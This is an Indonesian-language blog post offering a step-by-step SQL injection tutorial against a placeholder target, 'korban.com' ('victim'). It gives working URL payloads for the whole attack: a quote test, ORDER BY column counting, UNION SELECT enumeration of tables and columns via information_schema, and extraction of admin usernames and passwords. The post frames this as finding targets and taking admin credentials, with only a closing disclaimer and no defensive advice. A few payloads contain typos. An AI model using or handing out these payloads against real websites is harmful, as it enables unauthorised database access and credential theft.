 |
| sql injection |
SQL Injection
Pertama-tama, saya tidak bermaksud untuk menggurui kawan2 sekalian, tutorial kali ini murni untuk sharing kepada kawan2 yang belum tahu. Dan semoga setelah membaca postingan ini bisa bertambah ilmunya heheheh. . . :p
Sql injection??
Ya.. kali ini kita akan membahas sedikit mengenai sql injection, apa itu Sql Injection?
Sql injection adalah salah satu dari sekian banyak teknik seorang attacker untuk mendapatkan data-data penting dari sebuah website, misalnya user admin dan password. Ada beberapa macam teknik sql injection, tapi pada postingan kali ini, kita hanya akan membahas basicnya. Hehehe
Kenapa sebuah website memiliki bug sqli?
Hmm.. sebuah website yang vurl terhadap sqli biasanya karena kurangnya filtering atau adanya kesalahan coding oleh webmasternya, nah akibatnya client bisa melakukan perintah-perintah SQL melalui Url yang kemudian di eksekusi oleh databasenya. Yahh.. kurang lebih begitulah, maaf kalau salah Hehehe :D
Bagaimana melakukan Sql injection??
Pertama-tama, kita harus mencari targetnya, asumsikan target kita adalah
http://korban.com/berita.php?id=2
Kemudian kita cek apakah web itu rentan terhadap sqli dengan cara menambahkan tanda petik ' pada akhir Url
Http://korban.com/berita.php?id=2'
apabila terdapat error berarti web tersebut bisa di Sqli
Setelah itu kita cari jumlah tablenya dengan perintah +order+by+ dan -- sebagai penutup perintahnya
Lakukan sampe error hilang, atau sebaliknya adanya error..
Http://korban.com/berita.php?id=+2+order+by+1--
Http://korban.com/berita.php?id=+2+order+by+2--
Http://korban.com/berita.pgp?id=+2+order+by+3--
Http://korban.com/berita.pgp?id=+2+order+by+4--
Http://korban.com/berita.pgp?id=+2+order+by+5-- << misalnya errornya hilang
Karena errornya pada 5 berarti kita ambil sampe 4
Setelah itu kita gunakan perintah union untuk mencari angka yang show atau yang biasa saya bilang angka keramat, hehehe . .
Http://korban.com/berita.php?id=2+union+select+1,2,3,4--
Misalkan angka yang keluar adalah angka 2, sekarang kita cek versi Mysqlnya dengan perintahversion() atau @@version pada angka yang keluar tadi,
Http://korban.com/berita.php?id=2+union+select+1,version(),3,4--
Apabila versi 5 kita bisa melanjutkan pencarian table dengan perintah information_schema akan tetapi kalau yang keluar versi 4, mending tinggalkan target ini karena kita harus main tebak-tebakan nama table.
Selanjutkan kita cari nama table yang ada.
Http//korban.com/berita.php?id=2+union+select+1,group_concat(table_name),3,4+from+information_schema.tables+where
+table_schema=database()--
Nah perhatikan nama table yang keluar, misalnya nama table yang keluar adalah admin, members, berita. Dari table tersebut, sepertinya table admin memiliki informasi yang menarik. Untuk mengetahui data yang ada pada table tersebut kita harus cek colum yang ada terlebih dahulu, namun sebelumnya kita harus conver nama tablennya ke Hex (dump).
saya menggunakan situs Http://hogehoge.tk/tool-i/ untuk mengconvertnya
Hasilnya, admin > 61646d696e
Sekarang kita cek colum yang ada pada table admin
Http://korban.com/berita.php?id=2+union+select+,group_concat(table_name),3,4+from+information_schema.columns+where+table_name=0x61646d696e--
Perhatikan nama colum yang ada pada tabel admin, misalnya nama tablenya adalah username , password, id. Selanjutnya mari kita liat isi colum tersebut.
Http://korban.com/berita.php?id=2+union+select+1,concat_ws(0x3a,username,password,id),3,4+from+admin--
Warning : Saya tidak bertanggungjawab atas penyalahgunaan informasi yang ada pada blog ini.
0 komentar:
Speak up your mind
Tell us what you're thinking... !